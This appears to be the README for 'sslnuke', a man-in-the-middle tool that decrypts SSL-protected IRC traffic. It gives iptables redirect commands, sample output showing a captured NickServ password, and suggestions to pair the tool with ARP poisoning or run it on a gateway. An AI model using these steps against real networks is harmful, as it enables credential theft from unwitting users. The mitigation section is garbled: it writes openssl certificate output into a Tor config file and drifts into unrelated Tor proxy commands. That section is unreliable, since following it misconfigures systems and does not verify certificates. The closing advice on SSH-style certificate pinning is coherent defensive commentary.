SSLNuke
The purpose of sslnuke is to write a tool geared towards decrypting and intercepting "secured" IRC traffic. There are plenty of existing tools that intercept SSL traffic already, but most of these are geared towards HTTP traffic. sslnuke targets IRC directly in order to demonstrate how easy it is to intercept "secured" communications. sslnuke usage is simple.
Usage:
First, add a user account for sslnuke to run as and add iptables rules to redirect traffic to it:
# useradd -s /bin/bash -m sslnuke
# grep sslnuke /etc/passwd
sslnuke:x:1000:1000::/home/sslnuke:/bin/bash
# iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \
--dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444
Finally, login as sslnuke, build, and run sslnuke:
# su -l sslnuke
# cd sslnuke
# make
# ./sslnuke
Run an IRC client and login to your favorite IRC network using SSL, IRC messages will be printed to stdout on sslnuke.
[*] Received connection from: 192.168.0.5:58007
[*] Opening connection to: 1.1.1.1:6697
[*] Connection Using SSL!
[*] irc.com -> AUTH (1.1.1.1): *** Looking up your hostname...
[*] irc.com -> AUTH (1.1.1.1): *** Found your hostname
[*] irc.com -> victim (1.1.1.1): *** You are connected to irc.com with TLSv1.2-AES256-GCM-SHA384-256bits
[*] 192.168.0.5 -> nickserv (192.168.0.5): id hello
[*] [email protected] -> victim (1.1.1.1): Password accepted - you are now recognized.
sslnuke will automatically detect a client using SSL and determine whether or not to use SSL. The code could also be easily modified to show web site passwords or FTP data, anything using SSL. To attack users on a network, sslnuke can be used in conjunction with an ARP poisoning tool, such as the one found at Blackhat Library or it can be deployed on a gateway.
Mitigation
Now on to the important part, how do we verify SSL connections? The first step is to transfer the SSL certificate over an alternative medium, the best way would be to have the administrator directly give you the certificate. However, if this is not possible, openssl can download the certificate from the server:
# openssl s_client -showcerts -connect irc.com:6697 > /etc/tor/torrc
# echo "AutomapHostsOnResolve 1" >> /etc/tor/torrc
# echo "TransPort 9040" >> /etc/tor/torrc
# echo "DNSPort 5353" >> /etc/tor/torrc
# killall -HUP tor
# iptables -t nat -A OUTPUT -p tcp -d 10.192.0.0/10 -j REDIRECT --to-ports 9040
# iptables -t nat -A OUTPUT -p udp --dport 53 -j REDIRECT --to-ports 5353
# ncat xxxxxxxxxxxxxxx.onion 6667
:irc.com NOTICE AUTH :*** Looking up your hostname...
:irc.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
^C
Ultimately, IRC clients should use an SSH-style key verification. On first connect, present the certificate fingerprint to the user and force the user to confirm it and then cache the certificate. If it changes the next time, do not allow the connection.